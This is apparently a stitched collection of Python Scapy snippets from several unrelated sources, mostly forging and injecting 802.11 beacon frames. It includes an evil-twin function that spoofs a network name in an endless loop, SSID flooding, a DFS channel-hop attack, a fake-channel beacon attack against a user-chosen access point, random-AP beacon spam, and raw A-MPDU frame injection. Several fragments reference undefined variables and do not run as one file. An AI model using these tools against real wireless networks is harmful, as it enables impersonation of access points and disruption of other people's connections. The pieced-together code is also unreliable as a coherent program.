def send_beacon_ex(essid,
interface,
privacy=PRIVACY_NONE,
bssid=None,
channel=6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=221,
info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
"\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
"\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") /
Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt(
ID=221,
info=
"\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"
))
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
def setPrivacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.beacon = RadioTap() / Dot11(
addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid
) / Dot11Beacon(cap='ESS+short-preamble+short-slot') / Dot11Elt(
ID="SSID", info=self.essid) / Dot11Elt(
ID="Rates",
info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(
ID="DSset", info=self.channel) / Dot11Elt(
ID=42, info="\x04") / Dot11Elt(
ID=47, info="\x04") / Dot11Elt(
ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WEP:
self.beacon = RadioTap() / Dot11(
addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid,
addr3=self.bssid) / Dot11Beacon(
cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(
ID="SSID", info=self.essid) / Dot11Elt(
ID="Rates",
info='\x82\x84\x8b\x96\x0c\x12\x18\x24'
) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt(
ID=42, info="\x04") / Dot11Elt(
ID=47, info="\x04") / Dot11Elt(
ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WPA:
self.beacon = RadioTap() / Dot11(
addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid
) / Dot11Beacon(
cap='ESS+privacy+short-preamble+short-slot'
) / Dot11Elt(ID="SSID", info=self.essid) / Dot11Elt(
ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24'
) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt(
ID=221,
info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
"\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
"\x00\x50\xf2\x01"
) / Dot11Elt(
ID=42, info="\x00"
) / Dot11Elt(
ID=50, info="\x30\x48\x60\x6c"
) / Dot11Elt(
ID=221,
info=
"\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"
)
def ssidFlood(ssid, senderMAC, channel): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=senderMAC, addr3=senderMAC) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) echann = Dot11Elt(ID="DSset", info=chr(channel)) frame = RadioTap()/dot11/beacon/essid/echann sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
def evilTwin():
fake_mac = RandMAC()
evil_twin = RadioTap() / Dot11(type=0,
subtype=8,
addr1="FF:FF:FF:FF:FF:FF",
addr2=fake_mac,
addr3=fake_mac) / Dot11Beacon() / Dot11Elt(
ID="SSID", info=ssid)
while True:
sendp(evil_twin, iface=interface, verbose=True)
def dfs_hop_attack(interface: MonitorInterface, ap: AP, essid: str, channel: int):
pkt = RadioTap() / Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap.bssid, addr3=ap.bssid) / \
Dot11Beacon(cap=0x9104) / Dot11Elt(ID='SSID', info=essid, len=len(essid)) / \
Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' # RSN Version 1
'\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP
'\x01\x00' # 2 Pairwise Cipher Suite (next line)
'\x00\x0f\xac\x04' # AES Cipher
'\x01\x00' # 1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' # Pre-Shared Key
'\xcc\x00' # Supports and requires MFP
)) / Dot11Elt(ID=37, len=3, info=bytes([0, channel, 1]))
while True:
interface.inject(pkt)
sleep(0.3)
def generateFrame(wifiName, macAddr):
'''
Méthode permettant de générer des frames de beacon à partir d'un nom et d'une MAC adresse
:wifiName: Le nom du wifi à usurper
:macAddr: La mac adresse à incorporer
'''
#creation de la frame
dot11 = Dot11(type=0,
subtype=8,
addr1="ff:ff:ff:ff:ff:ff",
addr2=macAddr,
addr3=macAddr)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=wifiName, len=len(wifiName))
frame = RadioTap() / dot11 / beacon / essid
return frame
def ssid_packet():
ap_mac = '00:00:00:00:00:00'
rt = RadioTap(len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(CHANNEL) +
'\xc0\x00\xc0\x01\x00\x00')
beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \
/ Dot11Beacon(cap=0x2105) \
/ Dot11Elt(ID='SSID', info="injected SSID") \
/ Dot11Elt(ID='Rates', info=AP_RATES) \
/ Dot11Elt(ID='DSset', info=chr(CHANNEL))
# Update sequence number
beacon_packet.SC = 0x3060
# Update timestamp
beacon_packet[Dot11Beacon].timestamp = time.time()
mpdu_len = len(beacon_packet) + 4
if mpdu_len % 4 != 0:
padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
else:
padding = ""
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(beacon_packet))
delim_sig = 0x4E
#print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)
#hexdump(ampdu_header)
data = ampdu_header / beacon_packet / maccrc / padding
data /= "\x00\x00\x20\x4e" * 8
data = str(data)
return data
def rnd_aps(iface):
s = conf.L2socket(iface=iface)
rnd_mac = RandMAC()
itx = 0
try:
while True:
s.send(
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=rnd_mac,
addr3=rnd_mac,
addr4=rnd_mac) / Dot11Beacon(cap="ESS") /
Dot11Elt(ID="SSID", info=b"VOTA " + LEL_AP[itx]) /
Dot11Elt(ID="Rates", info="\x0c\x12\x18\x24\x30\x48\x60\x6c") /
Dot11Elt(ID="DSset", info=chr(1)))
itx = (itx + 1) % len(LEL_AP)
time.sleep(0.001)
except Exception as e:
print(e)
s.close()
input = wepPkts.__class__(str(wepPkts)[0:-4])
#print(input.summary())
sendp(wepPkts)
# Sending a simple packet
sender='08:00:27:c6:e4:20'
dest='08:00:27:1b:8b:a3'
packet=Dot11(addr1=dest,addr2=sender,addr3=sender)/LLC()/SNAP()/IP(src="192.168.3.7",dst="192.168.3.5")/ICMP()/"Hello!"
print(packet.summary())
#print(packet.show())
sendp(packet)
encPkt = wepEncrypt(packet,'0123456789')
print(encPkt.summary())
#print(encPkt.show())
sendp(encPkt)
#Sending a Dot11 Beacon packet
SSID = 'Test SSID'
iface = 'eth0'
dot11 = Dot11(type=0, subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=sender,
addr3=sender)
beacon = Dot11Beacon()
essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID))
frame = RadioTap()/dot11/beacon/essid
print(frame.summary())
sendp(frame, iface=iface)
sniff(iface=iface, prn=PacketHandler)
# Target selection phase
choice = inputNumber("Please select the target (1-%d): " % (len(ap_list)), 1,
len(ap_list))
# ATTACK
ssid = ap_list[choice - 1]
realChannel = ap_ssidToChannel[ssid]
# Compute the fake channel (dist of 6 from the real one)
fakeChannel = realChannel - 6 if realChannel > 6 else realChannel + 6
print(
"Sending a fake beacons with SSID %s, channel %d (real channel is %d) (10/second)"
% (ssid, fakeChannel, realChannel))
sender_mac = RandMAC()
dot11 = Dot11(type=0,
subtype=8,
addr1="ff:ff:ff:ff:ff:ff",
addr2=sender_mac,
addr3=sender_mac) # Create Dot11 packet
beacon = Dot11Beacon(cap="ESS+privacy") # Add privacy
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) # Add ssid
echann = Dot11Elt(ID="DSset", info=chr(fakeChannel)) # Add channel
frame = RadioTap() / dot11 / beacon / essid / echann # Create finale frame
sendp(frame, inter=0.1, iface=iface,
loop=1) # Emit the beacon (10 times per second)
def send_beacon(iface, ssid, mac_address, count, list_path):
if count is None:
count = 1
if ssid is None:
ssid = random_mac()
if mac_address is None:
mac_address = random_mac()
if list_path is not None:
file = open(list_path)
data = json.load(file)
for single_count in range(0, count):
for single_data in data:
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22',
addr3=single_data['mac'])
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=single_data['ssid'], len=len(single_data['ssid']))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
frame.show()
sendp(frame, iface=iface, count=1)
if list_path is None:
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3=mac_address)
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
frame.show()
sendp(frame, iface=iface, count=count)
